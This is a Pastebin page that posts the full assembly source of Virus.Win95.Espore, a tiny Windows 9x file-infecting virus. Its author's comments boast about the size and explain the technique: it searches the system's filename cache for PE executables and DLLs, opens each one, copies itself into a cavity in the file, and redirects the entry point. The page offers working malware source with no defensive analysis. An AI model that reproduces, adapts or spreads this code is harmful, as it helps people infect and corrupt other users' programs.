Advertisement
FlyFar

Virus.Win95.Espore - Source Code

Jun 26th, 2023
929
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 3.60 KB | Cybersecurity | 0 0
  1. ;----------------------------  W95 ESPORE BY HenKy -----------------------------
  2. ;
  3. ;-AUTHOR:        HenKy
  4. ;
  5. ;-MAIL:          HenKy_@latinmail.com
  6. ;
  7. ;-ORIGIN:        SPAIN
  8. ;
  9.  
  10.  ; WOW!!!!   140 BYTES !!!! AND 100% RING 3 !!!! (ONLY WINDOZE 9X CAN SUPPORT IT)
  11.  
  12.  ; OF COURSE MIDFILE AND NO GROWING CAVITY TECH
  13.  
  14.  ; IT SEARCHS FILENAMES INTO CACHE (AND PARASITE THEM) :-)    
  15.  
  16.  
  17.  ; THE 0C1000000H ADDRESS IS USED AS BUFFER BECOZ WE HAVE WRITE/READ
  18.  
  19.  ; PRIVILEGES
  20.  
  21.  ; THE BFF712B9h ADDRESS IS THE CALL VINT21
  22.  
  23.  ; THE INITIAL EDX VALUE POINTS TO A 28KB CACHE BUFFER WICH CONTAINS SEVERAL
  24.  
  25.  ; FILENAMES WITH COMPLETE PATH (ONLY PE EXE/DLL )
  26.  
  27. .386P
  28. .MODEL FLAT
  29. LOCALS
  30.  
  31. EXTRN    ExitProcess:PROC
  32. MIX_SIZ  EQU  (FILE_END - MEGAMIX)
  33.  
  34. MACROSIZE   MACRO                  
  35.             DB      MIX_SIZ/00100 mod 10 + "0"
  36.             DB      MIX_SIZ/00010 mod 10 + "0"
  37.             DB      MIX_SIZ/00001 mod 10 + "0"
  38.             ENDM    
  39. .DATA
  40.         DB 'BIEN PEKE?O BIEN... LIKE AN ESPORE... HEHEHE',0  
  41.         DB ' W9X ESPORE SIZE = '
  42.         MACROSIZE                
  43.  
  44. .CODE
  45.  
  46. MEGAMIX: ; EDX: BUFFER
  47.          ; EAX: EIP
  48.          ; ECX: BUFFER
  49.      
  50. VINT21:            
  51.         DD 0BFF712B9h   ; MOV ECX,048BFF71H  ;-) Z0MBiE
  52.         DB 'H'          ; HenKy ;P
  53.         XCHG EDI, EAX   ; EDI: DELTA    
  54.         MOV  ESI,0C1000000H  ; ESI: BUFFER
  55.         MOV  EBP,EDI    ; NOW: EBP=EDI=DELTA=INT21H
  56.  
  57.         ;EDX: POINTER TO FNAME
  58.        
  59.         MOV ECX,28500 ; LIMIT
  60. PORK:
  61.         INC EDX
  62.         CMP WORD PTR [EDX],':C'
  63.         JE KAA
  64.         LOOP PORK
  65. OK:
  66.         PUSH 00401000H
  67.         OLD_EIP EQU $-4
  68. WARNING:
  69.         RET  
  70. KAA:
  71.         MOV AX, 3D02h                      
  72.         CALL [EDI]                      
  73.         XCHG EBX, EAX              
  74.         PUSHAD    ; SAVE ECX,EBX,EDX,EBP,EDI
  75.         CALL PHECT                  
  76.         POPAD
  77.         MOV AH, 3Eh                  
  78.         CALL [EDI]                          
  79.         JMP PORK
  80.                                            
  81. PHECT:
  82.                                
  83.         XOR ECX,ECX
  84.         MOV EDX, ESI                
  85.         MOV AH, 3Fh                  
  86.         CALL R_W
  87.         MOV ECX, [ESI+3Ch]            
  88.         LEA EAX, [ESI+ECX]            
  89.         CMP BYTE PTR [EAX], "P"        
  90.         JNE WARNING                
  91.         MOV ECX,[EAX+28H]
  92.         CMP ECX, 1024  
  93.         JB WARNING  
  94.         PUSH EBP
  95.         ADD ECX,[EAX+34H]
  96.         MOV [EBP+OLD_EIP-MEGAMIX],ECX
  97.         MOV EDI,EAX
  98.        
  99. PORRO:
  100.         INC EDI
  101.         CMP BYTE PTR [EDI],'B' ; hehehehe
  102.         JNE PORRO
  103.         INC EDI
  104.         SUB EDI,ESI
  105.         MOV EDX,EDI
  106.         XCHG DWORD PTR [EAX+28h], EDI
  107.         LEA EDI, [ESI+EDX]            
  108.         PUSH MIX_SIZ/4  
  109.         POP ECX                                    
  110.         POP EAX                        
  111.         PUSH EAX
  112.         XCHG ESI,EAX                                                    
  113.         REP MOVSD                                        
  114.         POP EDI                        
  115.         MOV EDX, EAX                                                      
  116. W:
  117.         MOV AH, 40h                    
  118. R_W:      
  119.         PUSHAD                        
  120.         XOR EAX,EAX                  
  121.         MOV AH, 42h                    
  122.         CDQ                            
  123.         CALL [EDI]                        
  124.         POPAD                          
  125.         MOV CH, 4h                                                    
  126.         CALL [EDI]
  127.         RET
  128.  
  129. ALIGN 4
  130. FILE_END:
  131.  
  132.         PUSH 0
  133.         CALL ExitProcess
  134.  
  135. END MEGAMIX
  136.  
Tags: virus asm win9x
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement